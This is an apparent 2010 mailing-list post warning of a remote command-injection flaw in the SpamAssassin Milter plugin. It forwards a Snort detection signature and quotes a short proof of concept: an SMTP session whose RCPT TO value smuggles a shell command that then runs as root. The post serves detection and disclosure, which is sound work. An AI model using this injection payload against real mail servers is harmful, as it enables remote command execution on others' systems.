On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote: > just a heads up: I don't know if there is a problem with SA milter, but > there is a snort signature for it now. > > > -------- Original Message -------- > Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote > Arbitrary Command Injection Attempt > Date: Mon, 8 Mar 2010 13:03:52 +0000 > From: Kevin Ross <kevros...@googlemail.com> > To: emerging-s...@emergingthreats.net > <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com> > > > > alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible > SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; > flow:established,to_server; content:"to|3A|"; nocase; > content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; > reference:url,www.securityfocus.com/bid/38578 > <http://www.securityfocus.com/bid/38578>; > reference:url,seclists.org/fulldisclosure/2010/Mar/140 > <http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;) > > Kev >
The key is this: "If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied recipient (RCPT TO)." POC IS $ nc localhost 25 220 ownthabox ESMTP Postfix (Ubuntu) mail from: me () me com 250 2.1.0 Ok rcpt to: root+:"|touch /tmp/foo" 250 2.1.5 Ok $ ls -la /tmp/foo -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
